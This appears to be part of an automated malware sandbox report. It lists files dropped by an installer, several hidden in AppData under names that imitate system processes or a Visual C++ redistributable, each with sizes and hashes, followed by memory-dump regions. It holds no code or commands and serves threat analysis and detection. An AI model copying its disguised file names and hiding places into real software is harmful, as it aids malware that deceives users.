C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe

Filesize
977KB

MD5
02ea34533272f916fb52990a45917913

SHA1
bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

SHA256
6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

SHA512
352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab238A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar245B.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

Filesize
171.6MB

MD5
8b3f5013a57c74340f3c2b2934f690b6

SHA1
71e3a9024ce32f5d869ce452dfc2161ec271333c

SHA256
b09fefea2fef46c5e79b26738869170f850e47449163dc1b549d0eb1a0be2bd9

SHA512
5d50d359ec8884df9175e2db9792f552fb7de6de86be12cc0135c9918c3db64c6937330448ababeddc8133c313582f880581d867a524f7f6b4ce2dbfde9fb1d8

Download Submit
C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

Filesize
173.4MB

MD5
966a3484ba37c2ed6aa407b56df8118f

SHA1
069f7949d82d25a817d7a5327050948c16c81d6a

SHA256
19a2ac385c0b722dd1419805af6b14e7189f8cea6eace2a57d6dfb83eac807cd

SHA512
01b60ae97e19cb0135b4db726d37a7eb791636b90136a04010f60808a78298918fa5f180fa7ec1a080f88821c40d4d054d3e4c0a953330fa4fd09c613b7027a5

Download Submit
C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

Filesize
173.1MB

MD5
f43803bc52e9c19d24aef789ea8c4953

SHA1
a9722ced9414c0f674d44fb091e7d05d922a103f

SHA256
24e0014620055633836f92a44ca94acf880616297ccc0a73660078f0b3e65286

SHA512
c86a98510d1fdc7a39d429ba1bc645ccfe4692ac1036009a89cd5de05a8203d835d0e04bd7f21a194c04d2ac3e4744368b8051fe4b50c658f55522d3bb04779f

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostgm.exe

Filesize
173.8MB

MD5
bdc850f026afb9f961fba7e2e4aa0f43

SHA1
5e58e0e63c6b104dad6a30981f8e658e3b2efa34

SHA256
e49627bf20c5f8d4ccf7a151ffc8914c611a9ab50dec24839ff05681353283a4

SHA512
2993334fde43b7f6ff7ac29b9ecf6879339e5b12c1fea856d001cbf99ad2dbdf34b7fe091a53a55a2b377b3895ca4751435394b03226f8d19534e3ed62422707

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostgm.exe

Filesize
176.0MB

MD5
d50ab5d38bb7b98f3f733f5901341c07

SHA1
bc711496efdb725fe15875b7058d0177f2cee228

SHA256
b550d1f82e46607ba8804a1f0374fc0b11221de0ee939c59b1ffef60b76cbe5c

SHA512
9015b9f6291aba6c1fc4c07277dc0cdfd516323ff40c3bc9d683b56a1063e6d2d7a85cca680fb051d8cc5e418d192dd56bddabb3ffcfda9cf8d15d919a8cc91a

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostgm.exe

Filesize
158.7MB

MD5
4b3f631706a7bb49384f83a4e924dae4

SHA1
36b89c42b3a47bf667f9e651deb8f18d7758c6cd

SHA256
fe246d654e0c596ab60c7a76e119e3e4a3dc33b15d15a82d53329e3530ab7e47

SHA512
9739d2470c515544a671bd9b5a3c066d351eb1aff690967b9612ac344636a4b6fdba451bc548ba64817ab8369404f10094b45384422f5112215027c668651f48

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X0Y6LGPJGKI1Q3P7XEVZ.temp

Filesize
7KB

MD5
e4d3ac0027cdddbb62f7f6e786e7aff1

SHA1
28da99326211871fadba897967798e67681e5620

SHA256
c72455e6f01eaee870899b4950157ab20a985c24a71853352ff28e057b255aa3

SHA512
cfd8c61961165ab474e07e7706445b5432efba9c5de232d39d164f7fd5c55a76011b058e16d3c90510ee9be0ecf20f85a56e767272ed1d40409a0681b1994bc6

Download Submit
C:\Users\Admin\AppData\Roaming\conhostgm.exe

Filesize
2.9MB

MD5
316fa77cc45d0802155448d648b417b4

SHA1
c60be59c3df582030f3bbbf7c93e3f6110a38c82

SHA256
dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

SHA512
4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

Download Submit
\ProgramData\VC_redist.x64.exe

Filesize
159.0MB

MD5
eff8d3c3b6f2ed2a535761ca58ac7833

SHA1
151b31247d52edd90fe4991be7534c2b0b9326ac

SHA256
8901e3ced0ca62d660b399c0a86989a04c98ffff2f6ee96e609533a6c68d88dd

SHA512
02032e649bed369202752d03a262021280e80e59054e1a429cec2678eec04c5590cd95454cda725565bb92be8fedf6e81707fbec23e73c1377a9199245625a4c

Download Submit
\ProgramData\VC_redist.x64.exe

Filesize
161.3MB

MD5
93e36c37d60b0713dc06d9ca3bd19e5d

SHA1
5267f6ddc373703d309ad91c83af5993a297728b

SHA256
9e8ace189817be53524ee8652b3f76a494ed9cb97f97a1fb87cc901c94cbe07e

SHA512
17287dce3f4f5287d137d82cb1935ed026fe14abc018113425ccdd8d90e4b938fc3bd2595aaaeb6c596e1f1257128a77ab3cf681fb26e9f474c90d56cdcfee33

Download Submit
\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

Filesize
174.3MB

MD5
ee5d3fc5fed02f4cbfd8833bb248707e

SHA1
f540584ac2c08086e8b9d0e58dde68451a72a23d

SHA256
baa2cd31401c43fdaf6afb913d3931327d085a0c03c98794a74089009d29613b

SHA512
a8470f4b787f11a47e27954f9ba92dbcb06a558699a8381b1393b5c591b63ce28e39461e9b8fb8109475a2e80c60e2686415db15bcd96c02ea3eebe82c649501

Download Submit
\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

Filesize
179.3MB

MD5
aee66f547688e02a0aca849a881bdbb0

SHA1
68f440b044e4d757699b678c2c1858a46da709e0

SHA256
f15fa21bef26e090668378f067b15636fb9be30f65206bb5344be3d234faef9b

SHA512
1b86a38ed5ac652a2c8c561042d92b51fd7375fed9fd9dc543b089f16ee24a5d2bae16dc84fefa40aa572c86c5f57dc1756dc32851674cc2b119fa906cadf65f

Download Submit
\Users\Admin\AppData\Roaming\.conhostgm.exe

Filesize
171.8MB

MD5
c6320a89dfb0d0762a34a0256c68a8ea

SHA1
e87a91eef2bb297681e25d88c099b6b4a62e92e2

SHA256
31a62add4cbcb436422369158a2bfb63bb235cf0c23aa5831e8d1df40bb3b181

SHA512
a743677f6efec58bfc6a7cdc95b5aae3430db3bd5f5d32274b9ce8c65afa6073a557d6f93fb1f13b13c837df0fc8e3cbb34e005af07f4e0e5f21c13f06ebb941

Download Submit
\Users\Admin\AppData\Roaming\.conhostgm.exe

Filesize
175.0MB

MD5
22d7a3492eba4609206a414e364a8727

SHA1
59d66764891140ea0af827f8d7c31a28ac192b35

SHA256
2230dc8c7d7bc8d5730f4a1f7cbc2786be7b03f6dd137dfcf6b1fb9416fa57d5

SHA512
585057263d3262d5a33855d56cfd300371e274fd6d6cadb9a99cd6198775d811beb4bb9bb82f3139d1451524f592a87a610e51fd98972a1ff45e369a4de2f658

Download Submit
\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe

Filesize
2.7MB

MD5
a019ace077ac382ccb8d83b19540926e

SHA1
f113d7549d85855bec628c2e626c340f5380bd12

SHA256
bb6075bd1a836e5ed1c92e1d0b10a2414509e5f634a33f502313bcf82ee498ae

SHA512
7a1bbffe2f6938399840e56c305ef3c3f03182cb1eef3555ad63699f43f749ceb8def18e8124cd3f8382c51a02ba2cc9960089287b05c85b9f0a0ff7b7b94618

Download Submit
memory/352-160-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/352-113-0x000000001C500000-0x000000001C6F6000-memory.dmp

Filesize
2.0MB

Download
memory/352-152-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/352-112-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/352-111-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/352-129-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download
memory/352-147-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/352-99-0x0000000000110000-0x0000000000208000-memory.dmp

Filesize
992KB

Download
memory/1620-279-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1620-273-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1620-277-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1620-275-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1620-276-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1620-274-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1952-215-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/1952-218-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1952-214-0x000007FEEDD10000-0x000007FEEE6AD000-memory.dmp

Filesize
9.6MB

Download
memory/2256-12-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2256-9-0x0000000073450000-0x00000000739FB000-memory.dmp

Filesize
5.7MB

Download
memory/2256-10-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2256-11-0x0000000073450000-0x00000000739FB000-memory.dmp

Filesize
5.7MB

Download
memory/2256-100-0x0000000073450000-0x00000000739FB000-memory.dmp

Filesize
5.7MB

Download
memory/2316-221-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
memory/2316-220-0x000007FEEDD10000-0x000007FEEE6AD000-memory.dmp

Filesize
9.6MB

Download
memory/2556-222-0x000007FEEDD10000-0x000007FEEE6AD000-memory.dmp

Filesize
9.6MB

Download
memory/2584-219-0x0000000001EB0000-0x0000000001F30000-memory.dmp

Filesize
512KB

Download
memory/2584-216-0x000007FEEDD10000-0x000007FEEE6AD000-memory.dmp

Filesize
9.6MB

Download
memory/2880-151-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/2880-138-0x00000000771D0000-0x00000000771D1000-memory.dmp

Filesize
4KB

Download
memory/2880-166-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-162-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-159-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-158-0x0000000000420000-0x000000000042C000-memory.dmp

Filesize
48KB

Download
memory/2880-154-0x0000000077180000-0x0000000077181000-memory.dmp

Filesize
4KB

Download
memory/2880-153-0x0000000077190000-0x0000000077191000-memory.dmp

Filesize
4KB

Download
memory/2880-165-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-150-0x00000000003F0000-0x00000000003FC000-memory.dmp

Filesize
48KB

Download
memory/2880-164-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-143-0x00000000003D0000-0x00000000003DE000-memory.dmp

Filesize
56KB

Download
memory/2880-169-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-168-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-170-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-167-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-177-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-161-0x0000000077170000-0x0000000077171000-memory.dmp

Filesize
4KB

Download
memory/2880-156-0x0000000000410000-0x000000000041E000-memory.dmp

Filesize
56KB

Download
memory/2880-211-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/2880-125-0x0000000000B90000-0x0000000000D96000-memory.dmp

Filesize
2.0MB

Download
memory/2880-126-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp

Filesize
9.9MB

Download
memory/2880-130-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/2880-148-0x00000000771A0000-0x00000000771A1000-memory.dmp

Filesize
4KB

Download
memory/2880-146-0x00000000003E0000-0x00000000003EE000-memory.dmp

Filesize
56KB

Download
memory/2880-144-0x00000000771B0000-0x00000000771B1000-memory.dmp

Filesize
4KB

Download
memory/2880-139-0x00000000771C0000-0x00000000771C1000-memory.dmp

Filesize
4KB

Download
memory/2880-141-0x00000000003B0000-0x00000000003C8000-memory.dmp

Filesize
96KB

Download
memory/2880-133-0x0000000000180000-0x000000000018E000-memory.dmp

Filesize
56KB

Download
memory/2880-137-0x0000000000190000-0x00000000001AC000-memory.dmp

Filesize
112KB

Download
memory/2880-131-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-163-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2880-134-0x00000000771E0000-0x00000000771E1000-memory.dmp

Filesize
4KB

Download
memory/2880-135-0x000000001AEE0000-0x000000001AF60000-memory.dmp

Filesize
512KB

Download
memory/2912-217-0x0000000002EA0000-0x0000000002F20000-memory.dmp

Filesize
512KB

Download
memory/2912-0-0x0000000000FA0000-0x000000000195A000-memory.dmp

Filesize
9.7MB

Download
memory/2912-213-0x000007FEEDD10000-0x000007FEEE6AD000-memory.dmp

Filesize
9.6MB

Download
memory/2912-212-0x000000001B8A0000-0x000000001BB82000-memory.dmp

Filesize
2.9MB

Download
memory/2912-6-0x0000000074500000-0x0000000074BEE000-memory.dmp

Filesize
6.9MB

Download
memory/2912-5-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download
memory/2912-4-0x0000000000FA0000-0x000000000195A000-memory.dmp

Filesize
9.7MB

Download
memory/2912-3-0x0000000000FA0000-0x000000000195A000-memory.dmp

Filesize
9.7MB

Download
memory/2912-2-0x0000000074500000-0x0000000074BEE000-memory.dmp

Filesize
6.9MB

Download
memory/2912-1-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

Filesize
3.8MB

Download